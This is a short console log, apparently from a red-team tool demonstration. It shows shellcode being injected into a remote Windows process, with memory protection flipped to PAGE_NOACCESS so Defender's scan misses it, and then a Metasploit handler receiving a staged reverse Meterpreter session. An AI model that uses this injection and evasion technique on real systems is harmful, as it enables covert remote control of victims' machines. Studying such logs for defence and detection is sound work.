[+] OpenProcess with PID 49416.[+] VirtualAllocEx (PAGE_EXECUTE_READ_WRITE) on 0x2C4.[+] WriteProcessMemory to 0x247A8CE0000.[+] VirtualProtectEx (PAGE_NOACCESS) on 0x247A8CE0000.[+] CreateRemoteThread (suspended) to 0x247A8CE0000.[+] Sleeping whilst Defender scans the remote process.[+] VirtualProtectEx (PAGE_EXECUTE_READ_WRITE) on 0x247A8CE0000.[+] Resume thread 0x368.
meterpreter shell:
msf6 exploit(multi/handler) > Started HTTPS reverse handler on https[:]//192.168.1.228:443https[:]//192.168.1.228:443 handling request from 192.168.1.142; (UUID: lsezjczd) Staging x64 payload (201308 bytes) ...Meterpreter session 1 opened (192.168.1.228:443 -> 192.168.1.142:60433) at 2021-10-07 08:32:00 +0100